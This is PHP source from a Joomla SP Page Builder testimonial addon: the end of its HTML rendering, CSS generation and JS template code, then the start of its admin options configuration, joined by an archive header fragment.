				$output .= '</a>';	
				} else {
					$output .= '<i style="width:' . $avatar_size . 'px;height:' . ( $avatar_size + 1 ) . 'px;line-height:' . ( $avatar_size - 2 ) . 'px;font-size:' . ( $avatar_size / 1.8 ) . 'px;" class="fa fa-user pull-'.$avatar_position.'"></i>';
				}
			}
		
		} 
		if ($avatar_position != 'center') {
			$output .= '<div style="text-align:'.$avatar_position.'" class="sppb-media-body">';
		} else {
			$output .= '<div class="sppb-media-body centered">';
		}
		
		$output .= $review;
			
		if ($avatar_position != 'center') {
			$output .= '<footer><strong>'.$name.'</strong> <cite>'.$company.'</cite></footer>';
		} else {
			$output .= '<footer><strong>'.$name.'</strong> <cite>'.$company.'</cite>';
			if ($avatar) {
				$output .= '<div style="margin-top:15px;" class="div-pull-center clearfix"></div>';
				if ($link != '') {
					$output .= '<a' . $link_target . ' class="pull-center" href="'.$link.'">';
					$output .= '<img class="sppb-media-object pull-center" src="'.$avatar.'" width="' . $avatar_size . '" alt="'.$name.'">';
					$output .= '</a>';
				} else {
					$output .= '<img class="sppb-media-object pull-center" src="'.$avatar.'" width="' . $avatar_size . '" alt="'.$name.'">';
				}
			} else {
				$output .= '<div style="margin-top:15px;" class="div-pull-center clearfix"></div>';
				if ($link != '') {
					
				$output .= '<a' . $link_target . ' class="pull-center" href="'.$link.'">';
				$output .= '<i style="width:' . $avatar_size . 'px;height:' . ( $avatar_size + 1 ) . 'px;line-height:' . ( $avatar_size - 2 ) . 'px;font-size:' . ( $avatar_size / 1.8 ) . 'px;" class="fa fa-user centered"></i>';
				$output .= '</a>';	
				} else {
					$output .= '<i style="width:' . $avatar_size . 'px;height:' . ( $avatar_size + 1 ) . 'px;line-height:' . ( $avatar_size - 2 ) . 'px;font-size:' . ( $avatar_size / 1.8 ) . 'px;" class="fa fa-user pull-center"></i>';
				}
			}
			$output .= '</footer>';
		}
		
		// Link bellow
		if($show_footer_link){
			$output .= $link ? '<div class="clearfix"></div><a' . $link_target . ' href="'.$link.'"><em style="vertical-align:top;" class="pro-client-url">'.$link_strip.'</em></a><i class="pe pe-7s-link"></i>' : '';
		}
		// Rating
		if($client_rating_enable){
			$output .= '<div class="sppb-addon-testimonial-rating">';
			if($client_rating == 1){
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
			} elseif($client_rating == 2){
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
			} elseif($client_rating == 3){
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
			} elseif($client_rating == 4){
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star-o" aria-hidden="true"></i>';
			} elseif($client_rating == 5){
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
				$output .= '<i class="fa fa-star" aria-hidden="true"></i>';
			}
			$output .= '</div>';
		}
	
		$output .= '</div>';
		$output .= '</div>';
	}
	 
		$output .= '</div>';
		$output .= '</div>';
	
		return $output;

	}


	public function css() {
		$settings = $this->addon->settings;	
		$css = '';
		$style = '';
		$style_sm = '';
		$style_xs = '';
		$style .= (isset($settings->review_color) && $settings->review_color) ? "color: " . $settings->review_color . ";" : "";
		$style .= (isset($settings->review_size) && $settings->review_size) ? "font-size: " . $settings->review_size . "px;" : "";
		$style_sm .= (isset($settings->review_size_sm) && $settings->review_size_sm) ? "font-size: " . $settings->review_size_sm . "px;" : "";
		$style_xs .= (isset($settings->review_size_xs) && $settings->review_size_xs) ? "font-size: " . $settings->review_size_xs . "px;" : "";

		$style .= (isset($settings->review_line_height) && $settings->review_line_height) ? "line-height: " . $settings->review_line_height . "px;" : "";
		$style_sm .= (isset($settings->review_line_height_sm) && $settings->review_line_height_sm) ? "line-height: " . $settings->review_line_height_sm . "px;" : "";
		$style_xs .= (isset($settings->review_line_height_xs) && $settings->review_line_height_xs) ? "line-height: " . $settings->review_line_height_xs . "px;" : "";
		

		if($style){
			$css .= '#sppb-addon-' . $this->addon->id . ' .sppb-media-body{ ' . $style . ' }';
		}

		if($style_sm){
			$css .= '@media (min-width: 768px) and (max-width: 991px) {#sppb-addon-' . $this->addon->id . ' .sppb-media-body{ ' . $style_sm . ' }}';
		}

		if($style_xs){
			$css .= '@media (max-width: 767px) {#sppb-addon-' . $this->addon->id . ' .sppb-media-body{ ' . $style_xs . ' }}';
		}

		$icon_style = '';
		$icon_style_sm = '';
		$icon_style_xs = '';

		$icon_style .= (isset($settings->icon_color) && $settings->icon_color) ? "color: " . $settings->icon_color . ";" : "";
		
		$icon_style .= (isset($settings->icon_size) && $settings->icon_size) ? "font-size: " . $settings->icon_size . "px;width: " . $settings->icon_size . "px;" : "";
		$icon_style_sm .= (isset($settings->icon_size_sm) && $settings->icon_size_sm) ? "font-size: " . $settings->icon_size_sm . "px;" : "";
		$icon_style_xs .= (isset($settings->icon_size_xs) && $settings->icon_size_xs) ? "font-size: " . $settings->icon_size_xs . "px;" : "";
		
		
		//Rating style
		$client_rating_color = (isset($settings->client_rating_color) && $settings->client_rating_color) ? 'color:'.$settings->client_rating_color.';' : '';
		$client_unrated_color = (isset($settings->client_unrated_color) && $settings->client_unrated_color) ? 'color:'.$settings->client_unrated_color.';' : '';
		$rating_style = '';
		$rating_style .= (isset($settings->client_rating_fontsize) && $settings->client_rating_fontsize) ? 'font-size:'.$settings->client_rating_fontsize.'px;' : '';
		$rating_style .= (isset($settings->client_rating_margin) && $settings->client_rating_margin) ? 'margin:'.$settings->client_rating_margin.';box-shadow:none;border:0;background:transparent;' : '';
		if($rating_style){
			$css .= '#sppb-addon-' . $this->addon->id . ' .sppb-addon-testimonial-rating i.fa{ ' . $rating_style . ' }';
		}
		if($client_rating_color){
			$css .= '#sppb-addon-' . $this->addon->id . ' .sppb-addon-testimonial-rating i.fa-star{ ' . $client_rating_color . ' }';
		}
		if($client_unrated_color){
			$css .= '#sppb-addon-' . $this->addon->id . ' .sppb-addon-testimonial-rating i.fa-star-o{ ' . $client_unrated_color . ' }';
		}

		if($icon_style){
			$css .= '#sppb-addon-' . $this->addon->id . ' .sppb-addon-testimonial .fa{ ' . $icon_style . ' }';
		}
		
		//Rating tablet style
		$rating_style_sm = '';
		$rating_style_sm .= (isset($settings->client_rating_fontsize_sm) && $settings->client_rating_fontsize_sm) ? 'font-size:'.$settings->client_rating_fontsize_sm.'px;' : '';
		$rating_style_sm .= (isset($settings->client_rating_margin_sm) && $settings->client_rating_margin_sm) ? 'margin:'.$settings->client_rating_margin_sm.';' : '';
		
		
		if($icon_style_sm){
			$css .= '@media (min-width: 768px) and (max-width: 991px) {';
			if($icon_style_sm){
				$css .= '#sppb-addon-' . $this->addon->id . ' .sppb-addon-testimonial .fa{';
				$css .= $icon_style_sm;
				$css .= '}';
			}
			if($rating_style_sm){
				$css .= '#sppb-addon-' . $this->addon->id . ' .sppb-addon-testimonial-rating i.fa{ ' . $rating_style_sm . ' }';
			}
			$css .= '}';
		}
		
		//Rating tablet style
		$rating_style_xs = '';
		$rating_style_xs .= (isset($settings->client_rating_fontsize_xs) && $settings->client_rating_fontsize_xs) ? 'font-size:'.$settings->client_rating_fontsize_xs.'px;' : '';
		$rating_style_xs .= (isset($settings->client_rating_margin_xs) && $settings->client_rating_margin_xs) ? 'margin:'.$settings->client_rating_margin_xs.';' : '';

		if($icon_style_xs){
			$css .= '@media (max-width: 767px) {';
				if($icon_style_xs){
					$css .= '#sppb-addon-' . $this->addon->id . ' .sppb-addon-testimonial .fa{';
					$css .= $icon_style_xs;
					$css .= '}';
				}
				if($rating_style_xs){
					$css .= '#sppb-addon-' . $this->addon->id . ' .sppb-addon-testimonial-rating i.fa{ ' . $rating_style_xs . ' }';
				}
			$css .= '}';
		}

		return $css;
	}

	public static function getTemplate()
	{

		$output = '
			<#
				let testimonialAlignment = data.alignment || "sppb-text-center"
				let avatar_position = data.avatar_position || "left"
				let avatar = ""
				if (typeof data.avatar !== "undefined" && typeof data.avatar.src !== "undefined") {
					avatar = data.avatar
				} else {
					avatar = {src: data.avatar}
				}
				let avatar_shape = data.avatar_shape || "sppb-avatar-circle"
				let reviewer_link = data.link || ""
				let link_target = (data.link_target)? "target=\'"+ data.link_target +"\'": ""
				if(!data.designation_position){
					data.designation_position = "bottom";
				}
			#>

			<style type="text/css">
				<# if(data.show_quote){ #>
					#sppb-addon-{{ data.id }} .sppb-addon-testimonial .fa-quote-left,
					#sppb-addon-{{ data.id }} .sppb-addon-testimonial .fa-quote-right{
						<# if(_.isObject(data.icon_size)){ #>
							font-size: {{ data.icon_size.md }}px;
						<# } #>
						color: {{ data.icon_color }};
					}
				<# }
				if(data.avatar_width || data.avatar_margin){ #>
					#sppb-addon-{{ data.id }} .sppb-addon-testimonial-content-wrap img {
						height:{{data.avatar_width}}px;
						width:{{data.avatar_width}}px;
						<# if(_.isObject(data.avatar_margin)){ #>
							margin: {{data.avatar_margin.md}};
						<# } #>
					}
				<# }
				if(data.avatar_dis_block){ #>
					#sppb-addon-{{ data.id }} .sppb-addon-testimonial-content-wrap > span,
					#sppb-addon-{{ data.id }} .sppb-addon-testimonial-content-wrap {
						display:block;
					}
				<# } #>
				#sppb-addon-{{ data.id }} .sppb-addon-testimonial-review{
					<# if(_.isObject(data.review_size)){ #>
						font-size: {{ data.review_size.md }}px;
					<# }
					if(_.isObject(data.review_line_height)){ #>
						line-height: {{ data.review_line_height.md }}px;
					<# }
					if(_.isObject(data.review_margin)){ #>
						margin: {{ data.review_margin.md }};
					<# } #>
					color: {{ data.review_color }};
					font-weight: {{ data.review_fontweight }};
				}
                #sppb-addon-{{ data.id }} .sppb-addon-testimonial-footer .sppb-addon-testimonial-client {
                    <# if(data.name_color){ #>
                        color: {{data.name_color}};
                    <# }
                    if(_.isObject(data.name_font_size)){ #>
                        font-size: {{data.name_font_size.md}}px;
                    <# }
                    if(_.isObject(data.name_line_height)){ #>
                        line-height: {{data.name_line_height.md}}px;
                    <# }
                    if(_.isObject(data.name_margin)){ #>
                        margin: {{data.name_margin.md}};
                    <# }
                    if(_.isEmpty(data.name_font_style) && !data.name_font_style){
					#>
                        font-weight:700;
                    <# }
                    if(_.isObject(data.name_font_style)){ #>
                        <# if(data.name_font_style.underline){ #>
                            text-decoration:underline;
                        <# }
                        if(data.name_font_style.italic){
                        #>
                            font-style:italic;
                        <# }
                        if(data.name_font_style.uppercase){
                        #>
                            text-transform:uppercase;
                        <# }
                        if(data.name_font_style.weight){
                        #>
                            font-weight:{{data.name_font_style.weight}};
                        <# } #>
                    <# } #>
                }
                #sppb-addon-{{ data.id }} .sppb-addon-testimonial-footer .sppb-addon-testimonial-client-url {
                    <# if(data.company_color){ #>
                        color: {{data.company_color}};
                    <# }
                    if(_.isObject(data.company_font_size)){ #>
                        font-size: {{data.company_font_size.md}}px;
                    <# }
                    if(_.isObject(data.company_line_height)){ #>
                        line-height: {{data.company_line_height.md}}px;
                    <# }
                    if(_.isObject(data.company_font_style)){ #>
                        <# if(data.company_font_style.underline){ #>
                            text-decoration:underline;
                        <# }
                        if(data.company_font_style.italic){
                        #>
                            font-style:italic;
                        <# }
                        if(data.company_font_style.uppercase){
                        #>
                            text-transform:uppercase;
                        <# }
                        if(data.company_font_style.weight){
                        #>
                            font-weight:{{data.company_font_style.weight}};
                        <# } #>
                    <# } #>
				}
				<# if(data.client_rating_enable){ #>
					#sppb-addon-{{ data.id }} .sppb-addon-testimonial-rating i{
						<# if(_.isObject(data.client_rating_fontsize)){ #>
							font-size:{{data.client_rating_fontsize.md}}px;
						<# }
						if(_.isObject(data.client_rating_margin)){ #>
							margin:{{data.client_rating_margin.md}};
						<# } else { #>
							margin:{{data.client_rating_margin}};
						<# } #>
					}
				<# }
				if(data.client_rating_color){ #>
					#sppb-addon-{{ data.id }} .sppb-addon-testimonial-rating i.fa-star{ 
						color: {{data.client_rating_color}};
					}
				<# }
				if(data.client_unrated_color){
				#>
					#sppb-addon-{{ data.id }} .sppb-addon-testimonial-rating i.fa-star-o{
						color: {{data.client_unrated_color}};
					}
				<# } #>
				@media (min-width: 768px) and (max-width: 991px) {
					<# if(data.show_quote){ #>
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial .fa-quote-left,
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial .fa-quote-right{
							<# if(_.isObject(data.icon_size)){ #>
								font-size: {{ data.icon_size.sm }}px;
							<# } #>
						}
					<# } #>
	
					#sppb-addon-{{ data.id }} .sppb-addon-testimonial-review{
						<# if(_.isObject(data.review_size)){ #>
							font-size: {{ data.review_size.sm }}px;
						<# } #>
						<# if(_.isObject(data.review_line_height)){ #>
							line-height: {{ data.review_line_height.sm }}px;
						<# }
						if(_.isObject(data.review_margin)){ #>
							margin: {{ data.review_margin.sm }};
						<# } #>
					}
					<# if(data.name_font_size || data.name_line_height || data.name_margin){ #>
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial-footer .sppb-addon-testimonial-client {
							<# if(_.isObject(data.name_font_size)){ #>
								font-size: {{data.name_font_size.sm}}px;
							<# } #>
							<# if(_.isObject(data.name_line_height)){ #>
								line-height: {{data.name_line_height.sm}}px;
							<# }
							if(_.isObject(data.name_margin)){ #>
								margin: {{data.name_margin.sm}};
							<# } #>
						}
					<# } #>
					<# if(data.company_font_size || data.company_line_height){ #>
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial-footer .sppb-addon-testimonial-client-url {
							<# if(_.isObject(data.company_font_size)){ #>
								font-size: {{data.company_font_size.sm}}px;
							<# }
							if(_.isObject(data.company_line_height)){ #>
								line-height: {{data.company_line_height.sm}}px;
							<# } #>
						}
					<# }
					if(data.avatar_margin){ #>
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial-content-wrap img {
							<# if(_.isObject(data.avatar_margin)){ #>
								margin: {{data.avatar_margin.sm}};
							<# } #>
						}
					<# } #>
					<# if(data.client_rating_enable){ #>
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial-rating i{
							<# if(_.isObject(data.client_rating_fontsize)){ #>
								font-size:{{data.client_rating_fontsize.sm}}px;
							<# }
							if(_.isObject(data.client_rating_margin)){ #>
								margin:{{data.client_rating_margin.sm}};
							<# } #>
						}
					<# } #>
				}
				@media (max-width: 767px) {
					<# if(data.show_quote){ #>
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial .fa-quote-left,
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial .fa-quote-right{
							<# if(_.isObject(data.icon_size)){ #>
								font-size: {{ data.icon_size.xs }}px;
							<# } #>
						}
					<# } #>
	
					#sppb-addon-{{ data.id }} .sppb-addon-testimonial-review{
						<# if(_.isObject(data.review_size)){ #>
							font-size: {{ data.review_size.xs }}px;
						<# } #>
						<# if(_.isObject(data.review_line_height)){ #>
							line-height: {{ data.review_line_height.xs }}px;
						<# }
						if(_.isObject(data.review_margin)){ #>
							margin: {{ data.review_margin.xs }};
						<# } #>
					}
					<# if(data.name_font_size || data.name_line_height || data.name_margin){ #>
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial-footer .sppb-addon-testimonial-client {
							<# if(_.isObject(data.name_font_size)){ #>
								font-size: {{data.name_font_size.xs}}px;
							<# } #>
							<# if(_.isObject(data.name_line_height)){ #>
								line-height: {{data.name_line_height.xs}}px;
							<# }
							if(_.isObject(data.name_margin)){ #>
								margin: {{data.name_margin.xs}};
							<# } #>
						}
					<# } #>
					<# if(data.company_font_size || data.company_line_height){ #>
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial-footer .sppb-addon-testimonial-client-url {
							<# if(_.isObject(data.company_font_size)){ #>
								font-size: {{data.company_font_size.xs}}px;
							<# }
							if(_.isObject(data.company_line_height)){ #>
								line-height: {{data.company_line_height.xs}}px;
							<# } #>
						}
					<# }
					if(data.avatar_margin){ #>
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial-content-wrap img {
							<# if(_.isObject(data.avatar_margin)){ #>
								margin: {{data.avatar_margin.xs}};
							<# } #>
						}
					<# } #>
					<# if(data.client_rating_enable){ #>
						#sppb-addon-{{ data.id }} .sppb-addon-testimonial-rating i{
							<# if(_.isObject(data.client_rating_fontsize)){ #>
								font-size:{{data.client_rating_fontsize.xs}}px;
							<# }
							if(_.isObject(data.client_rating_margin)){ #>
								margin:{{data.client_rating_margin.xs}};
							<# } #>
						}
					<# } #>
				}
			</style>

			<div class="sppb-addon sppb-addon-testimonial {{ data.class }} {{ testimonialAlignment }}">
				<# if( !_.isEmpty( data.title ) ){ #><{{ data.heading_selector }} class="sppb-addon-title sp-inline-editable-element" data-id={{data.id}} data-fieldName="title" contenteditable="true">{{ data.title }}</{{ data.heading_selector }}><# } #>
				<div class="sppb-addon-content">
					<# if(data.show_quote && data.designation_position !== "top"){ #>
						<span class="fa fa-quote-left"></span>
					<# } #>
					<# if(data.designation_position == "top") { #>
						<div class="sppb-testimonial-top-content sppb-addon-testimonial-footer">
							<# if (reviewer_link) { #>
								<a {{ link_target }} href=\'{{{ reviewer_link }}}\'>
							<# } #>
							<div class="sppb-addon-testimonial-content-wrap">
							<# if (avatar.src && avatar.src.indexOf("https://") == -1 && avatar.src.indexOf("http://") == -1) { #>
								<img class="{{ avatar_shape }} sppb-addon-testimonial-avatar" src=\'{{ pagebuilder_base + avatar.src }}\' width="{{ data.avatar_width }}" height="{{ data.avatar_width }}" alt="{{ data.name }}">
							<# } else if(avatar){ #>
								<img class="{{ avatar_shape }} sppb-addon-testimonial-avatar" src=\'{{ avatar.src }}\' width="{{ data.avatar_width }}" height="{{ data.avatar_width }}" alt="{{ data.name }}">
							<# } #>
							<span>
								<span class="sppb-addon-testimonial-client">{{ data.name }}</span>
								<br /><span class="sppb-addon-testimonial-client-url">{{ data.company }}</span>
							</span>
							</div>
							<# if (reviewer_link) { #>
								</a>
							<# } #>
							<# if(data.show_quote){ #>
								<span class="fa fa-quote-right"></span>
							<# } #>
						</div>
						<# if(data.client_rating_enable){ #>
							<div class="sppb-addon-testimonial-rating">
							<# if(data.client_rating == 1){ #>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
							<# } else if(data.client_rating == 2){ #>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
							<# } else if(data.client_rating == 3){ #>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
							<# } else if(data.client_rating == 4){ #>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
							<# } else if(data.client_rating == 5){ #>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
							<# } #>
							</div>
						<# }
					} #>
					<div id="addon-review-{{data.id}}" class="sppb-addon-testimonial-review sp-editable-content" data-id={{data.id}} data-fieldName="review">
					{{{ data.review }}}
					</div>
					<# if(data.designation_position !== "top") { #>
						<div class="sppb-addon-testimonial-footer">
						<# if (reviewer_link) { #>
							<a {{ link_target }} href=\'{{{ reviewer_link }}}\'>
						<# } #>
						<div class="sppb-addon-testimonial-content-wrap">
						<# if (avatar.src && avatar.src.indexOf("https://") == -1 && avatar.src.indexOf("http://") == -1) { #>
							<img class="{{ avatar_shape }} sppb-addon-testimonial-avatar" src=\'{{ pagebuilder_base + avatar.src }}\' width="{{ data.avatar_width }}" height="{{ data.avatar_width }}" alt="{{ data.name }}">
						<# } else if(avatar.src){ #>
							<img class="{{ avatar_shape }} sppb-addon-testimonial-avatar" src=\'{{ avatar.src }}\' width="{{ data.avatar_width }}" height="{{ data.avatar_width }}" alt="{{ data.name }}">
						<# } #>
						<span>
							<span class="sppb-addon-testimonial-client">{{ data.name }}</span>
							<br /><span class="sppb-addon-testimonial-client-url">{{ data.company }}</span>
						</span>
						</div>
						<# if (reviewer_link) { #>
							</a>
						<# } #>
						</div>
						<# if(data.client_rating_enable){ #>
							<div class="sppb-addon-testimonial-rating">
							<# if(data.client_rating == 1){ #>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
							<# } else if(data.client_rating == 2){ #>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
							<# } else if(data.client_rating == 3){ #>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
							<# } else if(data.client_rating == 4){ #>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star-o" aria-hidden="true"></i>
							<# } else if(data.client_rating == 5){ #>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
								<i class="fa fa-star" aria-hidden="true"></i>
							<# } #>
							</div>
						<# }
					} #>
				</div>
			</div>
			';

		return $output;
	}
}
PK!M�.0*0*/flex/sppagebuilder/addons/testimonial/admin.phpnu&1i�<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2016 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('restricted aceess');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_testimonial',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_DESC'),
		'category'=>'Content',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				// Title
				'title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
					'std'=>  ''
				),

				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
					'std'=>'h3',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
					'depends'=>array(array('title', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-addon-title { font-family: {{ VALUE }}; }'
					)
				),

				'title_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
					'max'=>400,
					'responsive'=>true
				),

				'title_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
					'max'=>400,
					'responsive'=>true
				),

				'title_font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_top'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
					'max'=>400,
					'responsive'=>true
				),

				'title_margin_bottom'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
					'max'=>400,
					'responsive'=>true
				),
				
				'style'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_TYPE'),
					'desc'=>JText::_(''),
					'values'=>array(
						'default'=>JText::_('Default'),
						'flex'=>JText::_('Flex'),
						),
					'std'=>'flex',
				),

				'show_quote'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_SHOW_ICON'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
					'depends'=>array(array('style', '=', 'flex')),
				),

				'icon_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_ICON_SIZE'),
					'std'=>array('md'=>22, 'sm'=>22, 'xs'=>24),
					'min'=>10,
					'max'=>200,
					'responsive'=>true,
					'depends'=>array(array('show_quote', '=', 1),array('style', '=', 'flex')),
				),

				'icon_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_ICON_COLOR'),
					'depends'=>array(array('show_quote', '=', 1),array('style', '=', 'flex')),
				),

				// Content
				'review'=>array(
					'type'=>'editor',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_REVIEW'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_REVIEW_DESC'),
					'std'=>'Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch.'
				),

